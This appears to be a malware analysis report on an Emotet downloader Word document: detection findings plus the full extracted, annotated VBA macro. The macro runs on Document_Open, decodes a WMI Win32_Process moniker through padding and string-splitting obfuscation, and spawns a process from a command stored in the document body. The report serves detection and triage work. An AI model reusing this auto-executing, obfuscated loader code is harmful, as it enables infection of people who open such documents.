MALICIOUS
Risk Score: 172
Heuristics: 7
-
ClamAV: Doc.Downloader.EmotetRed02224-9938637-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.EmotetRed02224-9938637-0
-
VBA macros detected — medium — 3 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script: `Set Tx527vhwo2t8f = CreateObject(Ccwarym3vj03kce9)`
-
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro — low — OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script: `Private Sub Document_open()`
-
Suspicious extracted artifact — info — EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7306 bytes |

SHA-256: cd2cdccd599e42cfa9fbd13cb834d7d13272d1d23a56e4724093d32e3972c403
Detection
ClamAV: No threats found
Obfuscation or payload: likely
64 of 122 identifiers look randomly generated (e.g. 'Gd6tg8elqhltp41ulx') — consistent with name-mangling obfuscation.
Preview script — First 1,000 lines of the extracted script
' Module attributes of the first extracted module. VB_Name is the obfuscated
' module name and VB_Base = "1Normal.ThisDocument" marks it as the document's
' ThisDocument module; the macro below refers to this module by that name
' (Ut2r21ym17z8.StoryRanges) to read the document body.
Attribute VB_Name = "Ut2r21ym17z8"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-execution entry point: Word runs Document_open when the document is
' opened (the OLE_VBA_DOCOPEN finding above). Its only action is to call the
' obfuscated function Rvbcusut6emx, where the actual behaviour lives.
Private Sub Document_open()
Rvbcusut6emx
End Sub
' Two further VB_Name attributes with no body between them — presumably the
' headers of additional (empty or p-code-only) modules that the extractor
' emitted back to back; TODO confirm against the raw VBA project streams.
Attribute VB_Name = "L95wkirc_zm"
Attribute VB_Name = "Wnoyuuu28ekk6591v"
' Main routine invoked from Document_open.
'
' Structure: every live statement is separated from the next by a padding
' block of the form `GoTo <label>` ... `<label>:`. The GoTo jumps straight to
' the label, so the Set/Dim/Fix/cube-root lines in between never execute;
' they only exist to dilute the code (the label name is even used as if it
' were a variable inside the skipped block). Reading only the lines that
' follow each label gives the real control flow:
'   1. read the document body text into dsfe
'   2. build a string from separator-laden fragments
'   3. strip the separator via O9o8x19hao7d2 / Jkjaruxs2sfkcu
'   4. CreateObject on the result and call .Create with the decoded body text
' From a detection standpoint the interesting point is step 4: the command
' that would run is not in the macro at all but in the document body, so the
' macro source alone does not show the final payload.
Function Rvbcusut6emx()
' Suppresses every runtime error so that references to names that are never
' assigned (e.g. Mudv4xgi6y7p, Y5bloykz5698et6) do not abort the routine.
On Error Resume Next
Kcrzazn3nba1w_cbo = Mudv4xgi6y7p
' dsfe receives the main story text of this document (Ut2r21ym17z8 is the
' ThisDocument module, see VB_Base above). Y5bloykz5698et6 and
' A64w5ib25j6s36z79 are not assigned anywhere in the visible listing; if they
' are Empty they contribute nothing to the concatenation — confirm in a sandbox.
dsfe = Y5bloykz5698et6 + Ut2r21ym17z8.StoryRanges(wdMainTextStory) + A64w5ib25j6s36z79
' Padding block: unreachable until kJLlUyR:.
GoTo kJLlUyR
Set LLIuCIBBB = qspTA
Dim IXWSCCJ As Double
IXWSCCJ = Fix(kJLlUyR)
If IXWSCCJ <> kJLlUyR Then Exit Function
Dim dFxICEjw As Double
dFxICEjw = IXWSCCJ ^ (1 / 3)
If Fix(dFxICEjw) ^ 3 = IXWSCCJ Then
zmkyT = True
ElseIf (Fix(dFxICEjw) + 1) ^ 3 = IXWSCCJ Then
zmkyT = True
End If
kJLlUyR:
' String fragments. Every fragment is interleaved with the literal separator
' "w]xm[v", which Jkjaruxs2sfkcu later removes; with the separator gone these
' two read "p" and "rocess".
g42 = "w]xm[vpw]xm[v"
M4678w8zpmchehsiki = "w]xm[vrow]xm[vw]xm[vcew]xm[vsw]xm[vsw]xm[vw]xm[v"
' Padding block: unreachable until oXEtI:.
GoTo oXEtI
Set RfdoD = lQgtJ
Dim NgFCwDc As Double
NgFCwDc = Fix(oXEtI)
If NgFCwDc <> oXEtI Then Exit Function
Dim wBPVCHmC As Double
wBPVCHmC = NgFCwDc ^ (1 / 3)
If Fix(wBPVCHmC) ^ 3 = NgFCwDc Then
pOJMnADCJ = True
ElseIf (Fix(wBPVCHmC) + 1) ^ 3 = NgFCwDc Then
pOJMnADCJ = True
End If
oXEtI:
' Fragment: ":win32_" once the separator is stripped.
Vivyln4bl6peyh = "w]xm[v:ww]xm[vw]xm[vinw]xm[v3w]xm[v2w]xm[v_w]xm[v"
' Padding block: unreachable until gGWPAaQE:.
GoTo gGWPAaQE
Set RMuSICrX = MzYdG
Dim IFSjFIkG As Double
IFSjFIkG = Fix(gGWPAaQE)
If IFSjFIkG <> gGWPAaQE Then Exit Function
Dim KAAvICJ As Double
KAAvICJ = IFSjFIkG ^ (1 / 3)
If Fix(KAAvICJ) ^ 3 = IFSjFIkG Then
ammiJ = True
ElseIf (Fix(KAAvICJ) + 1) ^ 3 = IFSjFIkG Then
ammiJ = True
End If
gGWPAaQE:
' Fragment: "winmgmt" once the separator is stripped.
Re7_zgy8m2ij4x3e9a = "ww]xm[vinw]xm[vmw]xm[vgmw]xm[vtw]xm[vw]xm[v"
' Padding block: unreachable until iMCSwT:.
GoTo iMCSwT
Set rxeqDoVb = qsfzvZAB
Dim RiwhJ As Double
RiwhJ = Fix(iMCSwT)
If RiwhJ <> iMCSwT Then Exit Function
Dim QiUwq As Double
QiUwq = RiwhJ ^ (1 / 3)
If Fix(QiUwq) ^ 3 = RiwhJ Then
QhiuG = True
ElseIf (Fix(QiUwq) + 1) ^ 3 = RiwhJ Then
QhiuG = True
End If
iMCSwT:
' Mid(Application.Name, 6, 1): a single character taken from the host
' application's name (position 6, length 1) — the fragment is derived from the
' environment rather than stored as a literal, which also ties the decoded
' string to running inside Word.
Ydortovj0ize4kyb43 = "w]xm[vw]xm[v" + Mid(Application.Name, 4 + 2, 2 - 1) + "w]xm[vw]xm[v"
' Padding block: unreachable until syZqCACD:.
GoTo syZqCACD
Set Deywj = RYasHk
Dim bdthsD As Double
bdthsD = Fix(syZqCACD)
If bdthsD <> syZqCACD Then Exit Function
Dim iBHSjSEa As Double
iBHSjSEa = bdthsD ^ (1 / 3)
If Fix(iBHSjSEa) ^ 3 = bdthsD Then
kamgFA = True
ElseIf (Fix(iBHSjSEa) + 1) ^ 3 = bdthsD Then
kamgFA = True
End If
syZqCACD:
' Concatenation order: "winmgmt" + <char> + ":win32_" + "p" + "rocess".
' With Application.Name = "Microsoft Word" the sixth character is "s", so the
' decoded value is a WMI moniker for the Win32_Process class — verify in a
' sandbox, since the exact value depends on the host name and on the
' replacement string used by Jkjaruxs2sfkcu.
Gfqkpxn1x_fklh0 = Re7_zgy8m2ij4x3e9a + Ydortovj0ize4kyb43 + Vivyln4bl6peyh + g42 + M4678w8zpmchehsiki
' Padding block: unreachable until tjEOD:.
GoTo tjEOD
Set CsYsXv = GbHdGd
Dim EhgwMQ As Double
EhgwMQ = Fix(tjEOD)
If EhgwMQ <> tjEOD Then Exit Function
Dim QvXuJE As Double
QvXuJE = EhgwMQ ^ (1 / 3)
If Fix(QvXuJE) ^ 3 = EhgwMQ Then
KFoRcFUC = True
ElseIf (Fix(QvXuJE) + 1) ^ 3 = EhgwMQ Then
KFoRcFUC = True
End If
tjEOD:
' Separator removal (O9o8x19hao7d2 wraps Jkjaruxs2sfkcu).
Ccwarym3vj03kce9 = O9o8x19hao7d2(Gfqkpxn1x_fklh0)
' Padding block: unreachable until BcbiEV:.
GoTo BcbiEV
Set euEPorCJT = ZDZjIB
Dim aENWC As Double
aENWC = Fix(BcbiEV)
If aENWC <> BcbiEV Then Exit Function
Dim FqraEHXFK As Double
FqraEHXFK = aENWC ^ (1 / 3)
If Fix(FqraEHXFK) ^ 3 = aENWC Then
UTgTA = True
ElseIf (Fix(FqraEHXFK) + 1) ^ 3 = aENWC Then
UTgTA = True
End If
BcbiEV:
' The line matched by the OLE_VBA_CREATEOBJ finding: binds to the object
' named by the decoded string.
Set Tx527vhwo2t8f = CreateObject(Ccwarym3vj03kce9)
' Padding block: unreachable until HqDzXCHAl:.
GoTo HqDzXCHAl
Set UCwnFlrZJ = HCvew
Dim ZWQKFHwJE As Double
ZWQKFHwJE = Fix(HqDzXCHAl)
If ZWQKFHwJE <> HqDzXCHAl Then Exit Function
Dim PQQqeFIV As Double
PQQqeFIV = ZWQKFHwJE ^ (1 / 3)
If Fix(PQQqeFIV) ^ 3 = ZWQKFHwJE Then
pBfoEG = True
ElseIf (Fix(PQQqeFIV) + 1) ^ 3 = ZWQKFHwJE Then
pBfoEG = True
End If
HqDzXCHAl:
' Two consecutive padding blocks with no live statement between them.
GoTo ZtkoHFBJE
Set gpMvF = cFNuGfA
Dim ZJaTECrE As Double
ZJaTECrE = Fix(ZtkoHFBJE)
If ZJaTECrE <> ZtkoHFBJE Then Exit Function
Dim BXAuAz As Double
BXAuAz = ZJaTECrE ^ (1 / 3)
If Fix(BXAuAz) ^ 3 = ZJaTECrE Then
VDgoIuF = True
ElseIf (Fix(BXAuAz) + 1) ^ 3 = ZJaTECrE Then
VDgoIuF = True
End If
ZtkoHFBJE:
GoTo VjnuHqF
Set LFWNyIzJD = WLUaHmEM
Dim XulhC As Double
XulhC = Fix(VjnuHqF)
If XulhC <> VjnuHqF Then Exit Function
Dim vZKQBuM As Double
vZKQBuM = XulhC ^ (1 / 3)
If Fix(vZKQBuM) ^ 3 = XulhC Then
JYGXBIlF = True
ElseIf (Fix(vZKQBuM) + 1) ^ 3 = XulhC Then
JYGXBIlF = True
End If
VjnuHqF:
' Calls the .Create method of the object obtained above. The first argument
' is the document body text from character 5 onward (Mid(dsfe, 5, Len(dsfe))),
' passed through the same separator-stripping routine; the other two
' arguments are names that are never assigned in the visible listing.
' This is the point at which a child process would be created, and the
' document body — not the macro — is what holds the command line.
Tx527vhwo2t8f.Create O9o8x19hao7d2(Mid(dsfe, (1 + 4), Len(dsfe))), B7vzyodqxzgzye, T_5ge0cx2v7ltggvjl
' Trailing padding blocks: no live statement follows, the function then ends.
GoTo haldI
Set mtEnt = eIaaFZ
Dim dLkMB As Double
dLkMB = Fix(haldI)
If dLkMB <> haldI Then Exit Function
Dim NRQDYIEuB As Double
NRQDYIEuB = dLkMB ^ (1 / 3)
If Fix(NRQDYIEuB) ^ 3 = dLkMB Then
nqWzNZ = True
ElseIf (Fix(NRQDYIEuB) + 1) ^ 3 = dLkMB Then
nqWzNZ = True
End If
haldI:
GoTo wqynHT
Set nDoEDU = HlSCAZ
Dim gdhXNEq As Double
gdhXNEq = Fix(wqynHT)
If gdhXNEq <> wqynHT Then Exit Function
Dim hqoyYzBsF As Double
hqoyYzBsF = gdhXNEq ^ (1 / 3)
If Fix(hqoyYzBsF) ^ 3 = gdhXNEq Then
ZPIhEMFUB = True
ElseIf (Fix(hqoyYzBsF) + 1) ^ 3 = gdhXNEq Then
ZPIhEMFUB = True
End If
wqynHT:
End Function
' Decoding wrapper: copies its argument, passes it through Jkjaruxs2sfkcu
' (separator removal) and returns the result. The three live statements are
' separated by the same unreachable GoTo/label padding blocks used in
' Rvbcusut6emx; only the lines directly after each label execute.
'   Ky3nrnpvhpdr — the separator-laden string to decode
'   returns     — Jkjaruxs2sfkcu(Ky3nrnpvhpdr)
Function O9o8x19hao7d2(Ky3nrnpvhpdr)
On Error Resume Next
' Padding block: unreachable until wKzNWHJF:.
GoTo wKzNWHJF
Set prYcEiJ = IdwoCFMGd
Dim GyqdfE As Double
GyqdfE = Fix(wKzNWHJF)
If GyqdfE <> wKzNWHJF Then Exit Function
Dim qomwTEIy As Double
qomwTEIy = GyqdfE ^ (1 / 3)
If Fix(qomwTEIy) ^ 3 = GyqdfE Then
SBHKCG = True
ElseIf (Fix(qomwTEIy) + 1) ^ 3 = GyqdfE Then
SBHKCG = True
End If
wKzNWHJF:
' Live: copy the input.
Tqk2stc0yhg_4jf = Ky3nrnpvhpdr
' Padding block: unreachable until KVceECFW:.
GoTo KVceECFW
Set jSHOJAlCH = SyFFGiI
Dim NHXknCOIO As Double
NHXknCOIO = Fix(KVceECFW)
If NHXknCOIO <> KVceECFW Then Exit Function
Dim DFJhGAS As Double
DFJhGAS = NHXknCOIO ^ (1 / 3)
If Fix(DFJhGAS) ^ 3 = NHXknCOIO Then
IRzIEJEhH = True
ElseIf (Fix(DFJhGAS) + 1) ^ 3 = NHXknCOIO Then
IRzIEJEhH = True
End If
KVceECFW:
' Live: strip the "w]xm[v" separator.
Vs2ssn0bn7sfqy0gs_ = Jkjaruxs2sfkcu(Tqk2stc0yhg_4jf)
' Padding block: unreachable until GXOzFr:.
GoTo GXOzFr
Set LVentAcm = DFUrCC
Dim bmEDqv As Double
bmEDqv = Fix(GXOzFr)
If bmEDqv <> GXOzFr Then Exit Function
Dim euCMS As Double
euCMS = bmEDqv ^ (1 / 3)
If Fix(euCMS) ^ 3 = bmEDqv Then
LiKWuj = True
ElseIf (Fix(euCMS) + 1) ^ 3 = bmEDqv Then
LiKWuj = True
End If
GXOzFr:
' Live: set the return value.
O9o8x19hao7d2 = Vs2ssn0bn7sfqy0gs_
' Padding block: unreachable until OBHkWHOT:, after which the function ends.
GoTo OBHkWHOT
Set sjOmJFFlU = jEfqBuNJA
Dim bmUbGyE As Double
bmUbGyE = Fix(OBHkWHOT)
If bmUbGyE <> OBHkWHOT Then Exit Function
Dim AmBRDm As Double
AmBRDm = bmUbGyE ^ (1 / 3)
If Fix(AmBRDm) ^ 3 = bmUbGyE Then
KKUcJE = True
ElseIf (Fix(AmBRDm) + 1) ^ 3 = bmUbGyE Then
KKUcJE = True
End If
OBHkWHOT:
End Function
' Separator-removal primitive used by O9o8x19hao7d2: replaces every occurrence
' of the literal "w]xm[v" in the input with P04emo8yv2ao3jy8.
' P04emo8yv2ao3jy8 is not assigned anywhere in the visible listing; if it is
' an unassigned Variant it coerces to "" and the call simply deletes the
' separator — confirm against the full VBA project.
' Detection note: the constant separator string and this Replace call are a
' stable, signature-friendly feature of the sample even though all other
' identifiers are randomly generated.
Function Jkjaruxs2sfkcu(Gd6tg8elqhltp41ulx)
Jkjaruxs2sfkcu = Replace(Gd6tg8elqhltp41ulx, "w]xm[v", P04emo8yv2ao3jy8)
End Function